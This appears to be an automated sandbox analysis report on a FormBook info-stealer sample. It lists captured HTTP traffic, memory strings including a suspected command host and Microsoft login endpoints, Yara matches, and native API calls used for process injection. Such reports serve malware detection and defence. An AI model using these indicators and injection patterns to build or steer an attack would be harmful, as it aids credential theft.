e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)\|S9)a#Bknc.04(r0u?~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:03:51 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)\|S9)a#Bknc.04(r0u?~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Mar 2025 12:03:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 6c 61 73 73 2e 74 65 61 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 114<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.klass.team Port 80</address></body></html>0

Source: AAHiVVNIKQESryT.exe, 00000004.00000002.1321747792.0000000002581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3756250382.00000000049B4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.calimade.net
Source: Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3756250382.00000000049B4000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.calimade.net/1hc0/
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: help.exe, 0000000C.00000002.3752377980.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: help.exe, 0000000C.00000002.3752377980.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: help.exe, 0000000C.00000002.3752377980.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: help.exe, 0000000C.00000002.3752377980.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033)
Source: help.exe, 0000000C.00000002.3752377980.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: help.exe, 0000000C.00000002.3752377980.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: help.exe, 0000000C.00000002.3752377980.0000000002AE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: help.exe, 0000000C.00000003.1684855079.0000000007954000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: help.exe, 0000000C.00000002.3756911774.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp, help.exe, 0000000C.00000002.3754566780.0000000004BEA000.00000004.10000000.00040000.00000000.sdmp, Q1NBabd2fJUnEL1mh.exe, 00000010.00000002.3753893974.0000000003A2A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: help.exe, 0000000C.00000003.1690066067.0000000007978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 9.2.AAHiVVNIKQESryT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AAHiVVNIKQESryT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1467523310.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3753846723.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1466838131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3756250382.0000000004930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3753804208.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3751883739.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3753682119.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1470339779.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0042C623 NtClose,	9_2_0042C623
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2B60 NtClose,LdrInitializeThunk,	9_2_014F2B60
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_014F2DF0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_014F2C70
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F35C0 NtCreateMutant,LdrInitializeThunk,	9_2_014F35C0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F4340 NtSetContextThread,	9_2_014F4340
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F4650 NtSuspendThread,	9_2_014F4650
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2BE0 NtQueryValueKey,	9_2_014F2BE0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2BF0 NtAllocateVirtualMemory,	9_2_014F2BF0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2B80 NtQueryInformationFile,	9_2_014F2B80
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2BA0 NtEnumerateValueKey,	9_2_014F2BA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2AD0 NtReadFile,	9_2_014F2AD0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2AF0 NtWriteFile,	9_2_014F2AF0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2AB0 NtWaitForSingleObject,	9_2_014F2AB0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2D00 NtSetInformationFile,	9_2_014F2D00
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2D10 NtMapViewOfSection,	9_2_014F2D10
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2D30 NtUnmapViewOfSection,	9_2_014F2D30
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2DD0 NtDelayExecution,	9_2_014F2DD0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2DB0 NtEnumerateKey,	9_2_014F2DB0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2C60 NtCreateKey,	9_2_014F2C60
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2C00 NtQueryInformationProcess,	9_2_014F2C00
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2CC0 NtQueryVirtualMemory,	9_2_014F2CC0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2CF0 NtOpenProcess,	9_2_014F2CF0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2CA0 NtQueryInformationToken,	9_2_014F2CA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2F60 NtCreateProcessEx,	9_2_014F2F60
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2F30 NtCreateSection,	9_2_014F2F30
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2FE0 NtCreateFile,	9_2_014F2FE0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2F90 NtProtectVirtualMemory,	9_2_014F2F90
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2FA0 NtQuerySection,	9_2_014F2FA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2FB0 NtResumeThread,	9_2_014F2FB0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2E30 NtWriteVirtualMemory,	9_2_014F2E30
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2EE0 NtQueueApcThread,	9_2_014F2EE0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2E80 NtReadVirtualMemory,	9_2_014F2E80
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F2EA0 NtAdjustPrivilegesToken,	9_2_014F2EA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F3010 NtOpenDirectoryObject,	9_2_014F3010
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F3090 NtSetValueKey,	9_2_014F3090
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F39B0 NtGetContextThread,	9_2_014F39B0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F3D70 NtOpenThread,	9_2_014F3D70
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F3D10 NtOpenProcessToken,	9_2_014F3D10
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B4340 NtSetContextThread,LdrInitializeThunk,	12_2_030B4340
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B4650 NtSuspendThread,LdrInitializeThunk,	12_2_030B4650
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2B60 NtClose,LdrInitializeThunk,	12_2_030B2B60
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_030B2BA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_030B2BE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_030B2BF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2AD0 NtReadFile,LdrInitializeThunk,	12_2_030B2AD0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2AF0 NtWriteFile,LdrInitializeThunk,	12_2_030B2AF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2F30 NtCreateSection,LdrInitializeThunk,	12_2_030B2F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2FB0 NtResumeThread,LdrInitializeThunk,	12_2_030B2FB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2FE0 NtCreateFile,LdrInitializeThunk,	12_2_030B2FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_030B2E80
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_030B2EE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_030B2D10
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_030B2D30
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2DD0 NtDelayExecution,LdrInitializeThunk,	12_2_030B2DD0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_030B2DF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2C60 NtCreateKey,LdrInitializeThunk,	12_2_030B2C60
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_030B2C70
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_030B2CA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B35C0 NtCreateMutant,LdrInitializeThunk,	12_2_030B35C0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B39B0 NtGetContextThread,LdrInitializeThunk,	12_2_030B39B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2B80 NtQueryInformationFile,	12_2_030B2B80
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2AB0 NtWaitForSingleObject,	12_2_030B2AB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2F60 NtCreateProcessEx,	12_2_030B2F60
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2F90 NtProtectVirtualMemory,	12_2_030B2F90
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2FA0 NtQuerySection,	12_2_030B2FA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2E30 NtWriteVirtualMemory,	12_2_030B2E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2EA0 NtAdjustPrivilegesToken,	12_2_030B2EA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2D00 NtSetInformationFile,	12_2_030B2D00
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2DB0 NtEnumerateKey,	12_2_030B2DB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2C00 NtQueryInformationProcess,	12_2_030B2C00
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2CC0 NtQueryVirtualMemory,	12_2_030B2CC0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B2CF0 NtOpenProcess,	12_2_030B2CF0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B3010 NtOpenDirectoryObject,	12_2_030B3010
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B3090 NtSetValueKey,	12_2_030B3090
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B3D10 NtOpenProcessToken,	12_2_030B3D10
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_030B3D70 NtOpenThread,	12_2_030B3D70
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02698E40 NtCreateFile,	12_2_02698E40
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02698FA0 NtReadFile,	12_2_02698FA0
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02699290 NtAllocateVirtualMemory,	12_2_02699290
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02699090 NtDeleteFile,	12_2_02699090
Source: C:\Windows\SysWOW64\help.exe	Code function: 12_2_02699130 NtClose,	12_2_02699130

Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_00873E28	4_2_00873E28
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_0087E164	4_2_0087E164
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_00876F92	4_2_00876F92
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD3D69	4_2_06FD3D69
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FDA0A9	4_2_06FDA0A9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD5450	4_2_06FD5450
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD5440	4_2_06FD5440
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD5D28	4_2_06FD5D28
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD5D17	4_2_06FD5D17
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD63E8	4_2_06FD63E8
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD63D9	4_2_06FD63D9
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 4_2_06FD41B0	4_2_06FD41B0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00418723	9_2_00418723
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004028F0	9_2_004028F0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040E109	9_2_0040E109
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040E113	9_2_0040E113
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00416923	9_2_00416923
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00410133	9_2_00410133
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040E258	9_2_0040E258
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040E263	9_2_0040E263
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00403270	9_2_00403270
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00401230	9_2_00401230
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040E2AC	9_2_0040E2AC
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0042EC13	9_2_0042EC13
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_004045A7	9_2_004045A7
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_00404624	9_2_00404624
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040FF0A	9_2_0040FF0A
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0040FF13	9_2_0040FF13
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01548158	9_2_01548158
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014B0100	9_2_014B0100
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0155A118	9_2_0155A118
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015781CC	9_2_015781CC
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015801AA	9_2_015801AA
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015741A2	9_2_015741A2
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01552000	9_2_01552000
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157A352	9_2_0157A352
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014CE3F0	9_2_014CE3F0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015803E6	9_2_015803E6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01560274	9_2_01560274
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_015402C0	9_2_015402C0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C0535	9_2_014C0535
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01580591	9_2_01580591
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01572446	9_2_01572446
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01564420	9_2_01564420
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0156E4F6	9_2_0156E4F6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014E4750	9_2_014E4750
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C0770	9_2_014C0770
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014BC7C0	9_2_014BC7C0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014DC6E0	9_2_014DC6E0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014D6962	9_2_014D6962
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C29A0	9_2_014C29A0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0158A9A6	9_2_0158A9A6
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014CA840	9_2_014CA840
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C2840	9_2_014C2840
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014EE8F0	9_2_014EE8F0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014A68B8	9_2_014A68B8
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157AB40	9_2_0157AB40
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01576BD7	9_2_01576BD7
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014BEA80	9_2_014BEA80
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0155CD1F	9_2_0155CD1F
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014CAD00	9_2_014CAD00
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014BADE0	9_2_014BADE0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014D8DBF	9_2_014D8DBF
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C0C00	9_2_014C0C00
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014B0CF2	9_2_014B0CF2
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01560CB5	9_2_01560CB5
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01534F40	9_2_01534F40
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01562F30	9_2_01562F30
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_01502F28	9_2_01502F28
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014E0F30	9_2_014E0F30
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014B2FC8	9_2_014B2FC8
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014CCFE0	9_2_014CCFE0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0153EFA0	9_2_0153EFA0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C0E59	9_2_014C0E59
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157EE26	9_2_0157EE26
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157EEDB	9_2_0157EEDB
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0157CE93	9_2_0157CE93
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014D2E90	9_2_014D2E90
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014F516C	9_2_014F516C
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0158B16B	9_2_0158B16B
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014AF172	9_2_014AF172
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014CB1B0	9_2_014CB1B0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_014C70C0	9_2_014C70C0
Source: C:\Users\user\Desktop\AAHiVVNIKQESryT.exe	Code function: 9_2_0156F0CC	9_2_0156F0CC
